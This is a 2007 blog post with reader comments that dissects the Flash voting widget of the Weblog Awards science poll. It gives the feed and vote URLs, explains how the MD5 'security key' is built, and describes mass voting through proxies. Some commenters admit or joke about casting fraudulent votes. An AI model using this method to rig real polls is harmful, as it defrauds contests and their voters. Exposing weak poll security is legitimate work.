Science-Blogs@2007 Weblog Awards - Anatomy of a Break-In : 5ubliminal's TellinYa

<a href="http://www.tellinya.com/art2/229/">Science-Blogs@2007 Weblog Awards - Anatomy of a Break-In : 5ubliminal's TellinYa</a>
Must Reads: Web Scraping | Link Farming | Code Snippets | SEO Freeware
Reveal More!

I am more than sure that none of the owners of the sites involved condoned or suggested hacking the results. But they must have had fans with skills …

And also read the comments on each site: Pharyngula; Climate Audit 1,2 and BadAstronomy!
Damn! These scientists are haters …

What's the Science Scandal all about?

It appears that the science category voting at the 2007 weblog awards was completely flawed and gamed by both sides. Just that one side was a bit stronger in firepower - so some say. And I decided to verify this!

Tools of the Trade!

I needed:

  • Their Flash movie that enabled people to vote
  • A Swf Decompiler!
  • C++

First thing had to get a copy of the Flash file handling the poll which we find here in the HTML code of the page:

I needed to find where this Flash loaded the results (a feed) and where it casts the vote (URL). Now I was after the feed where they kept the internal results of the poll. After analyzing the Flash Code I finally found it at the end of the code:

I also needed a poll ID but I already found it above in the HTML code. At this point we need to see where the voting actually goes. The server-side script that handles the voting.

First wrap!

We know have the PollID = 117 , the XML Feed Address = http:// 2007.weblogawards.org / get_poll.php?poll_id=117 , the Server-Side Voting Script = http:// 2007.weblogawards.org / poll_vote.php? poll_id=poll_id&vote=opt_id&ver=security_key.

Analyzing the results feed!

This snapshot was taken way after the votes finished and the status of the poll is still open. Look at the red marks. We also see here the ID of each entry in opt_id which we need in the link to the voting server-side script.

We know have everything except their only security measure. The security_key which is required in the URL to vote.

Breaking the security key!

I will show you how this is put together after analyzing the swf file. We find 2 references of the security key. And we notice it's a simple thing:

We have the opt_id sum + "_" + BIG_S. The BIG_S can be seen in the XML feed above - the red thing in right top corner. After we have the concatenation of the three terms above we do an MD5 hash on them and then we convert this to HEX (00-FF) as no binary data goes over POST requests.

We now have a poll_id, opt_id, sec_key and the voting URL is easy to do. Do keep in mind the BIG_S changes everytime you load the page. So, in order to vote, you have to load the feed and then cast the vote for every vote.

This was easy … actually too easy! Clock time: 5 minutes + 10 minutes for the algorithm to actually do the work, which now is pointless and I won't code it anymore. How do I know it works???? Easy! Look below.

While looking at the Flash file they provide you a security key check. So you know the following:

And as I had both algorithms written I checked against the feed and I can produce the right key using this:

Steps left:

The hacker needs some proxies and then can attack the voting sequence at his will on any poll on anyone. The more proxies he has the better. I have full respect for both Bad Astronomy and Climate Audit which both gamed the system, as many say, and this proves that Science blogs do know science and good al-gore-ithms!

Why did security failed?

The hacking could take place during entire voting time and about 4 hours after official closing. For some security tips read my other post - defending your Polls and Server-Side scripts.

21 Comments Posted By Readers :

Add your comment
#1 sod from Germany web
Posted on Friday, 09 November, 2007
nice analysis, very good read!

well, web polls are not the best way to poll, i guess anyway..
#2 John A from Great Britain web
Posted on Friday, 09 November, 2007
I doubt very much that any of the blog owners knew of any hacking or would have approved such hacking.
That isn't to say that someone somewhere could have decomposed the voting sequence as you have and gamed the vote.
The major part of the whole horse race was to get people to take a look at all of the blogs. That definitely
The minor part was to watch PZ Myers spontaneously explode into a glorious firework display of infantile ranting ;-)
#3 5ubliminal web
Posted on Friday, 09 November, 2007
In difficult times people reveal their real selves and, sadly, PZ failed miserably to this test of life.
I don't think owners did or supported this but I'm sure they had fans who had the skills :)
#4 ga from Australia
Posted on Friday, 09 November, 2007
Well done. Very well done. A shame that it had to happen to science blogs, but good research. Let's hope that the fans think twice next time about this sort of tactic, and play fairly and honestly. It reflects poorly on them and very badly on who they vote for and for the legitimacy of the competition. Keep it clean!
#5 bigcitylib from Canada
Posted on Friday, 09 November, 2007
Assume someone figures out your technique. Could they vote dozens of times? Hundreds? in a day.
#6 Bernie from United States
Posted on Friday, 09 November, 2007
Will this hack be traceable?
#7 5ubliminal web
Posted on Friday, 09 November, 2007
A response pack :)

@bernie: It will be but it's difficult to drop votes out of the blue (dropped votes always come along with doubts). And you can only use a number of proxies. And they can be traced!
@bigcitylib: I can code this, in 10 minutes time, to hit 2500 votes per minute or even more to anyone. It CAN!
#8 lucia from United States web
Posted on Friday, 09 November, 2007
Sheesh! Voting in two of the competitions (Tech and Science) are being examined.

I think the flimsy security reflects very poorly on Weblogs for not including elementary server side security to screen over-votes as they occurred, and decent client side security features like captchas commonly found in blog comments!

Of course, there is one benefit to the contests' complete lack of security. The thousands of post-poll votes did make the vote-bot voting obvious even to those who don't understand your description of the security hole.
#9 5ubliminal web
Posted on Friday, 09 November, 2007
Indeed Lucia. Post-close voting is perfect evidence of fraud as humans could no longer vote being locked in the Flash side.
#10 Jim B from Canada
Posted on Friday, 09 November, 2007
You generally got it all right except this part:

"The hacker needs some proxies and then can attack the voting sequence at his will on any poll on anyone. The more proxies he has the better."

You actually did not need proxies all you need was new users on the same machine and it worked fine.

Also it's not "gambled the system", it's "gaming the system"
#11 5ubliminal web
Posted on Friday, 09 November, 2007
Yes and No. First of all I'm not US or UK or EN speaker so I may make some small errors in expressing myself.

You can vote with just one IP 1000s of votes but they are easy to spot (occuring in less then 24h) and drop. Having more then one IP you actually make it hard for the final cleaning part.
Yes, you could hit with just one IP but it's too obvious.

PS: I'd take my word for it Jim … maybe I did it ;)
#12 Jim B from Canada
Posted on Friday, 09 November, 2007
I stand corrected. I hope they publish the list of cheaters IP's proxies or not so they can be investigated.

Maybe you did it? I actually did to try it, but about 12 votes in a few minutes, just for proof of concept and then stopped. I had to try as soon as I saw it was Flash, I love hacking flash, why any one would use a client side voting system is beyond me.
#13 5ubliminal web
Posted on Friday, 09 November, 2007
I code in C++. One could just decompile FLASH and recompile with vote lock stripped.
But that needed way too many clicks.

I bet that was special software written for this.
#14 Jim B from Canada
Posted on Friday, 09 November, 2007
Could you post your code? I would be interested in seeing exactly what you did.
#15 5ubliminal web
Posted on Friday, 09 November, 2007
I would … but my entire code relies on a 250.000+ lines library I built during the past 9 years.
The actual code is only 100 lines long but dependencies exceed 10.000 lines and is unusable without them.
#16 papertiger from United States
Posted on Friday, 09 November, 2007
I know it's just for study purposes, but doesn't the fact that the poll was left open past the stated closing time mean that the poll propietor was intramental to, and/or in league with the cheating?
Since they are colluding, doesn't the end result reflect the way they wanted this poll to end?
#17 5ubliminal web
Posted on Friday, 09 November, 2007
This is, indeed, only for educational purposes ;)
I wouldn't say they were connected with the hackers. It ended the way someone else wanted.

For the admins of the site I only have one word made of two: Raw Incompetence and wishful thinking security.
They used the most well known security policy: This won't happen to me!
#18 lucia from United States web
Posted on Friday, 09 November, 2007
Weblogawards.com has called the race. It's a tie!

We are announcing a tie between Bad Astronomy Blog and Climate Audit, so there will be two winners in this category. Both blogs agree with this decision. We thank them both for helping resolve the issues that affected this poll as voting closed Thursday.
#19 papertiger from United States
Posted on Friday, 09 November, 2007
It occured to me that there is one way to check. Were the other polls, for best blogger or what not, also open post closing time?
If they were, this supports the incompetence theory. If not, then it supports the collusion theory.
Of course it might be too late to check.
#20 lucia from United States web
Posted on Saturday, 10 November, 2007
Papertiger: If someone at WeblogsAwards voted after polls closed, that would be truly incompetent!

Anyone in control of the system should be able to add votes anytime they want. If they wanted to fix the vote, they could just add them before closing the polls!
#21 papertiger from United States
Posted on Sunday, 11 November, 2007
I'm good with the way it all shook out. Bad Astronomy and Climate Audit are both on my favorites collumn. :-)

And I am looking forward to the rematch next year.
Post Feedback 
Name *
Mail *
URL
« Anti-Spam
» URL will only go live after a review. Comments are moderated. «
5ubliminal's TellinYa.com SEM & SEO Blog © 2007 - All rights reserved unless mentioned otherwise .
Rendered On : [Thursday, 07 August, 2008 - 23:06:58 GMT]   No Ajax / Flash Used Here
" Science-Blogs@2007 Weblog Awards - Anatomy of a Break-In : 5ubliminal's TellinYa "